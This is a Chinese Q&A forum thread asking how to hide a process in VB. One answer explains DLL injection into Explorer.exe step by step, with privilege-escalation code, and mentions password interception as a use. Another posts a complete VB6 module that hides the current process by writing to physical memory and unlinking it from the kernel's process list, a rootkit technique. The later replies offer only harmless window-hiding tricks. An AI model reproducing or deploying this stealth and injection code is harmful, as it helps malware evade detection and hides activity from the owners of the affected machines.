用VB实现隐藏进程
发布网友
发布时间:2022-05-07 04:31
我来回答
共5个回答
热心网友
时间:2023-10-15 16:38
晕,二楼的代码怎么那么熟悉?似乎我去年发的。。
隐藏进程现在常用的是进程插入技术,找一个进程:如Explorer.exe,将自身隐藏在这个进程之内
不过这样的代码还是会被杀毒软件发现,代码就用现成的了:
第一步,提升本进程的系统权限。
因为我们要操作的是系统中的其他进程,没有足够的系统权限是无法读取甚至写入其他进程的内存地址的。提升进程权限可能用到以下的函数:
1.函数OpenProcessToken(
HANDLE ProcessHandle, // 进程的句柄
DWORD DesiredAccess, // 对进程的访问描述
PHANDLE TokenHandle // 打开进程令牌的句柄指针
);
这个函数的作用是打开进程令牌。
2.函数LookupPrivilegeValue(
LPCTSTR lpSystemName, //系统名称
LPCTSTR lpName, // 特权名称
PLUID lpLuid // 本地系统唯一的ID号
);
这个函数将会返回一个本地系统内独一无二的ID,来用于系统权限的更改,它的第1个参数是系统名,nil表示本系统。第2个参数是特权的名字。第3个参数用来接收函数返回的ID。
3.函数AdjustTokenPrivileges(
HANDLE TokenHandle, //更改权限的令牌环句柄
BOOL DisableAllPrivileges, //是否修改所有权限的标志位
PTOKEN_PRIVILEGES NewState, //新的系统权限信息
DWORD BufferLength, //上一个参数的长度
PTOKEN_PRIVILEGES PreviousState, // 返回更改系统特权以前的权限
PDWORD ReturnLength //上一个参数的长度
);
这个函数用于更改进程的系统权限 ,第1个参数是要更改权限的令牌环句柄。第2个参数如果为true表示更改所有的系统权限 ,false表示更改部分。第3个参数是要更改的系统特权的值。第4个参数是第3个参数的大小。第5个参数返回更改系统特权以前的权限,我们不需要就设为nil。第6个参数是第5个参数的大小。
把上面的东西合并起来写成一个函数,我们在其他代码中间直接调用PromoteDebugPrivilege就可以提升本进程的系统权限了。代码如下:
======================================================================
function PromoteDebugPrivilege(const PromoteEnabled: Boolean): Boolean;
var
hToken: THandle;
TokenPriv: TOKEN_PRIVILEGES;
Length: DWORD;
begin
Result := False;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then
begin
TokenPriv.PrivilegeCount := 1;
LookupPrivilegeValue(nil, 'SeDebugPrivilege', TokenPriv.Privileges[0].Luid);
if PromoteEnabled then
TokenPriv.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else
TokenPriv.Privileges[0].Attributes := 0;
Length := 0;
AdjustTokenPrivileges(hToken, False, TokenPriv, SizeOf(TokenPriv), nil, Length);
Result := GetLastError = ERROR_SUCCESS;
CloseHandle(hToken);
end;
end;
第二步,进入宿主的内存空间
在拥有了进入宿主程序内存的权限之后,我们所要做的是在其内存空间加入一些新的程序代码,或者是让其载入一个Dll文件里面的函数并运行起来。加入新的代码可以省掉一个dll文件,而加载dll文件可以安装一些系统级的钩子,如果我们的*程序是一个截获密码的程序,加载dll就是一个很好的选择。
Kernel32.dll中的函数LoadLibraryW可以加载dll,它只需要dll文件的文件路径就可以完成操作,我们可以很容易的在程序代码中实现取出一个文件路径的操作。但是,我们希望在宿主程序中加载,而我们取出的dll文件路径并不存在于宿主程序的内存空间里面,所以我们需要把dll的文件路径写入宿主的内存空间。这些操作可能用到以下的函数:
1.函数OpenProcess(
DWORD dwDesiredAccess, //访问标志
BOOL bInheritHandle, //继承句柄标志
DWORD dwProcessId // 进程Id
);
这个函数用于修改我们宿主进程的一些属性,这些属性放在第一个参数里面,比如PROCESS_VM_OPERATION就是允许远程VM操作,即允许VirtualProtectEx和WriteProcessMemory函数操作本进程内存空间。PROCESS_CREATE_THREAD 就是允许远程创建线程。PROCESS_VM_WRITE就是允许远程VM写,即允许 WriteProcessMemory函数访问本进程的内存空间。第二个参数是一个标志参数,用来确定返回的句柄是否可以被新的进程继承。我们的程序中设为False。第三个参数需要操作的进程Id,也就是我们的宿主进程的Id。
2.函数VirtualAllocEx(
HANDLE hProcess, //要进行操作的进程句柄,当然是我们的宿主了
LPVOID lpAddress, //分配空间的起始地址
DWORD dwSize, //分配空间的大小
DWORD flAllocationType, // 分配空间的类型
DWORD flProtect // 访问保护类型
);
我们使用 VirtualAllocEx函数在宿主进程中开辟一块内存空间,用于存放dll的文件名。VirtualAllocEx的第1个参数是要操作的进程,第2个是起始地址,第3个是长度,第4,5个是操作参数。其中MEM_COMMIT表示本函数分配的是物理内存或者是内存的页面文件,PAGE_READWRITE表示分配的区域内允许读写。
3.函数WriteProcessMemory (
HANDLE hProcess, //所要操作进程的句柄
LPVOID lpBaseAddress, //开始进行些操作的起始地址
LPVOID lpBuffer, //要写入数据的缓冲区指针
DWORD nSize, // 要写的bytes数
LPDWORD lpNumberOfBytesWritten // 实际写入的bytes数
);
前面在宿主内存中创建好空间后,现在往里面写入dll的名称,而我们的WriteProcessMemory函数就可以胜任这一项工作。WriteProcessMemory函数的第一个参数 是需要往其内存里面写入dd的进程句柄,第二个参数是 “要进行写操作”的目标内存起始地址,第三个参数是 “需要被写入的数据”的地址,第四个参数是准备要写入的长度,第五个参数是实际操作中写的长度,这个参数是被函数输出的。到这里我们就已经能成功把dll的路径名称写进了宿主的内存空间。
第三步,在宿主中启动新的线程!
刚才我们已经在宿主程序中创建了一个用于存放一个dll文件路径的缓冲区,现在我们就要让这个dll在宿主的内存空间中运行起来。我们是用LoadLibraryW函数来加载的,而使用LoadLibraryW,又需要知道LoadLibraryW函数的入口地址。所以在加载dll之前,我们要用GetProcAddress来得到LoadLibraryW的入口地址。我们来看看这几个函数的使用方法:
1.GetProcAddress(
HMODULE hMole, //dll模块的句柄
LPCSTR lpProcName // 函数名称
);
我们用这个函数主要想得到kernel32.dll中的函数LoadLibraryW的入口地址,所以
GetProcAddress(GetMoleHandle('Kernel32'), 'LoadLibraryW')就可以了,当然有些细节得符合程序编译器的要求,VC下使用就要改成
GetProcAddress(GetMoleHandle(TEXT("Kernel32")), "LoadLibraryW")的形式。
2.CreateRemoteThread (
HANDLE hProcess, //要进行操作的进程句柄,也就是我们的宿主句柄
LPSECURITY_ATTRIBUTES lpThreadAttributes, //线程安全属性的指针
DWORD dwStackSize, //初始化堆(stack)的大小
LPTHREAD_START_ROUTINE lpStartAddress,//新建线程函数的指针,或叫做地址
LPVOID lpParameter, //新建线程函数的参数
DWORD dwCreationFlags, //标志位
LPDWORD lpThreadId //线程返回值
);
这个函数就是本文的点睛之笔了,我们之前所做所有的一切,都是在为它做准备工作,它的功能就是在其他任何进程中创建新的线程,让其他的程序或进程附加执行我们的代码。
热心网友
时间:2023-10-15 16:38
找到一高手的答案呵
在XP/2K系统中隐藏进程的VB代码
Attribute VB_Name = "modHideProcess"
'-------------------------------------------------------------------------------------
'模块名称:modHideProcess.bas
'
'模块功能:在 XP/2K 任务管理器的进程列表中隐藏当前进程
'
'使用方法:直接调用 HideCurrentProcess()
'
'模块作者:检索自互联网,原作者不详。
'
'修改日期:2006/08/26
'---------------------------------------------------------------------------------------
Option Explicit
Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
Private Const STATUS_ACCESS_DENIED = &HC0000022
Private Const STATUS_INVALID_HandLE = &HC0000008
Private Const ERROR_SUCCESS = 0&
Private Const SECTION_MAP_WRITE = &H2
Private Const SECTION_MAP_READ = &H4
Private Const READ_CONTROL = &H20000
Private Const WRITE_DAC = &H40000
Private Const NO_INHERITANCE = 0
Private Const DACL_SECURITY_INFORMATION = &H4
Private Type IO_STATUS_BLOCK
Status As Long
Information As Long
End Type
Private Type UNICODE_STRING
Length As Integer
MaximumLength As Integer
Buffer As Long
End Type
Private Const OBJ_INHERIT = &H2
Private Const OBJ_PERMANENT = &H10
Private Const OBJ_EXCLUSIVE = &H20
Private Const OBJ_CASE_INSENSITIVE = &H40
Private Const OBJ_OPENIF = &H80
Private Const OBJ_OPENLINK = &H100
Private Const OBJ_KERNEL_HandLE = &H200
Private Const OBJ_VALID_ATTRIBUTES = &H3F2
Private Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory As Long
ObjectName As Long
Attributes As Long
SecurityDeor As Long
SecurityQualityOfService As Long
End Type
Private Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End Type
Private Enum ACCESS_MODE
NOT_USED_ACCESS
GRANT_ACCESS
SET_ACCESS
DENY_ACCESS
REVOKE_ACCESS
SET_AUDIT_SUCCESS
SET_AUDIT_FAILURE
End Enum
Private Enum MULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
End Enum
Private Enum TRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
End Enum
Private Enum TRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
End Enum
Private Type TRUSTEE
pMultipleTrustee As Long
MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
TrusteeForm As TRUSTEE_FORM
TrusteeType As TRUSTEE_TYPE
ptstrName As String
End Type
Private Type EXPLICIT_ACCESS
grfAccessPermissions As Long
grfAccessMode As ACCESS_MODE
grfInheritance As Long
TRUSTEE As TRUSTEE
End Type
Private Type AceArray
List() As EXPLICIT_ACCESS
End Type
Private Enum SE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE = 0
SE_FILE_OBJECT
SE_SERVICE
SE_PRINTER
SE_REGISTRY_KEY
SE_LMSHARE
SE_KERNEL_OBJECT
SE_WINDOW_OBJECT
SE_DS_OBJECT
SE_DS_OBJECT_ALL
SE_PROVIDER_DEFINED_OBJECT
SE_WMIGUID_OBJECT
End Enum
Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long,
ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As
Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long,
ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As
Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As
Long
Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias
"SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries
As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias
"BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal
pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As
ACCESS_MODE, ByVal Inheritance As Long)
Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As
UNICODE_STRING, ByVal SourceString As Long)
Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long,
ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As
Long
Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As
Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal
dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As
Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination
As Any, Source As Any, ByVal Length As Long)
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA"
(LpVersionInformation As OSVERSIONINFO) As Long
Private Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type
Private verinfo As OSVERSIONINFO
Private g_hNtDLL As Long
Private g_pMapPhysicalMemory As Long
Private g_hMPM As Long
Private aByte(3) As Byte
Public Sub HideCurrentProcess()
'在进程列表中隐藏当前应用程序进程
Dim thread As Long, process As Long, fw As Long, bw As Long
Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long
verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) <> 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
select Case verinfo.dwMinorVersion
Case 0
lOffsetFlink = &HA0
lOffsetBlink = &HA4
lOffsetPID = &H9C
Case 1
lOffsetFlink = &H88
lOffsetBlink = &H8C
lOffsetPID = &H84
End select
End If
End If
End If
If OpenPhysicalMemory <> 0 Then
thread = GetData(&HFFDFF124)
process = GetData(thread + &H44)
fw = GetData(process + lOffsetFlink)
bw = GetData(process + lOffsetBlink)
SetData fw + 4, bw
SetData bw, fw
CloseHandle g_hMPM
End If
End Sub
Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
Dim pDacl As Long
Dim pNewDacl As Long
Dim pSD As Long
Dim dwRes As Long
Dim ea As EXPLICIT_ACCESS
GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0,
pDacl, 0, pSD
ea.grfAccessPermissions = SECTION_MAP_WRITE
ea.grfAccessMode = GRANT_ACCESS
ea.grfInheritance = NO_INHERITANCE
ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar
SetEntriesInAcl 1, ea, pDacl, pNewDacl
SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0,
ByVal pNewDacl, 0
CleanUp:
LocalFree pSD
LocalFree pNewDacl
End Sub
Private Function OpenPhysicalMemory() As Long
Dim Status As Long
Dim PhysmemString As UNICODE_STRING
Dim Attributes As OBJECT_ATTRIBUTES
RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")
Attributes.Length = Len(Attributes)
Attributes.RootDirectory = 0
Attributes.ObjectName = VarPtr(PhysmemString)
Attributes.Attributes = 0
Attributes.SecurityDeor = 0
Attributes.SecurityQualityOfService = 0
Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE,
Attributes)
If Status = STATUS_ACCESS_DENIED Then
Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)
SetPhyscialMemorySectionCanBeWrited g_hMPM
CloseHandle g_hMPM
Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE,
Attributes)
End If
Dim lDirectoty As Long
verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) <> 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
select Case verinfo.dwMinorVersion
Case 0
lDirectoty = &H30000
Case 1
lDirectoty = &H39000
End select
End If
End If
End If
If Status = 0 Then
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000)
If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM
End If
End Function
Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
Dim lTemp As Long
VAddr = addr
CopyMemory aByte(0), VAddr, 4
lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))
PGDE = BaseAddress + lTemp * 4
CopyMemory PGDE, ByVal PGDE, 4
If (PGDE and 1) <> 0 Then
lTemp = PGDE and &H80
If lTemp <> 0 Then
PAddr = (PGDE and &HFFC00000) + (VAddr and &H3FFFFF)
Else
PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE and &HFFFFF000, &H1000)
lTemp = (VAddr and &H3FF000) / (2 ^ 12)
PTE = PGDE + lTemp * 4
CopyMemory PTE, ByVal PTE, 4
If (PTE and 1) <> 0 Then
PAddr = (PTE and &HFFFFF000) + (VAddr and &HFFF)
UnmapViewOfFile PGDE
End If
End If
End If
LinearToPhys = PAddr
End Function
Private Function GetData(addr As Long) As Long
Dim phys As Long, tmp As Long, ret As Long
phys = LinearToPhys(g_pMapPhysicalMemory, addr)
tmp = MapViewOfFile(g_hMPM, 4, 0, phys and &HFFFFF000, &H1000)
If tmp <> 0 Then
ret = tmp + ((phys and &HFFF) / (2 ^ 2)) * 4
CopyMemory ret, ByVal ret, 4
UnmapViewOfFile tmp
GetData = ret
End If
End Function
Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
Dim phys As Long, tmp As Long, x As Long
phys = LinearToPhys(g_pMapPhysicalMemory, addr)
tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys and &HFFFFF000, &H1000)
If tmp <> 0 Then
x = tmp + ((phys and &HFFF) / (2 ^ 2)) * 4
CopyMemory ByVal x, data, 4
UnmapViewOfFile tmp
SetData = True
End If
End Function
Private Function ByteArrToLong(inByte() As Byte) As Double
Dim I As Integer
For I = 0 To 3
ByteArrToLong = ByteArrToLong + inByte(I) * (&H100 ^ I)
Next I
End Function
XP SP2 + VB6.0调试通过
要在一个系统进程中修改或者杀死另一个进程,需要做以下步骤:
1.提升进程自身身的权限,使之拥有高的特权级
2.搜索宿主进程
3.保存PCB
3.修改进程
4.如果出错,恢复PCB
这样解释你清楚了吗?
我想你可以把模块中的API的功能逐个了解一下,如果你不了解他们的作用,那么即使讲了也没有用,你可以去MSDN.microsoft上看一下相关的资料
type的API资料可以在FoxApi中查到
热心网友
时间:2023-10-15 16:39
进程好像不可以隐藏吧
如果能够隐藏那微软的那些系统进程怎么没有隐藏勒
如果是有任务管理器里的用户程序隐藏还是可以的
Private Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Call ShowWindow(GetWindow(Me.hwnd, 4), 0)
me.hwnd 是窗体的句柄
就算你进程能够隐藏还是可能通过API 全部扫描到的
包括扫描到你引用的第三方文件也能扫描到
不过太长了
这里不好发过来
热心网友
时间:2023-10-15 16:40
Private Sub Form_Load()
App.TaskVisible = False
End Sub
虽然没有隐藏进程`但是可以隐藏在应用程序那里的显示``
热心网友
时间:2023-10-15 16:40
加油啦 OK!